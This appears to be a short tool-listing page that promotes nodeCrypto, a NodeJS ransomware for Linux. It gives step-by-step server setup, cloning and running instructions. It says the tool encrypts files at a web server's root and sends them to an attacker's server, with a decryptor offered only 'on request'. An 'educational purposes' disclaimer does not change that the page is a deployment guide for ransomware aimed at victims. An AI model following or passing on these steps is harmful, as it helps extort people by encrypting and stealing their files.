nodeCrypto is a Linux Ransomware written in NodeJs that encrypt predefined files. This project was created for educational purposes, you are the sole responsible for the use of nodeCrypto.

Install server

Upload all file of server/ folder on your webserver.
Create a sql database and import sql/nodeCrypto.sql
Edit server/libs/db.php and add your SQL ID.

Also Read : SALT – SLUB ALlocator Tracer for the Linux Kernel

Install and run

git clone https://github.com/atmoner/nodeCrypto.git
cd nodeCrypto && npm install

You must edit first variable in index.js
Once your configuration is complete, you can start the ransomware.

node index.js

The files at the root of the web server will encrypt and send to the server.

To Do

  •  Client (victim)
    •  Encrypt webserver
    •  Use private key for encryption
    •  Adapt SSL
  •  Server
    •  Recover data (user + encrypted file)
    •  Format the database
    •  Make GUI for webserver
  •  Make an executable to decrypt the files (Only on request! Contact me)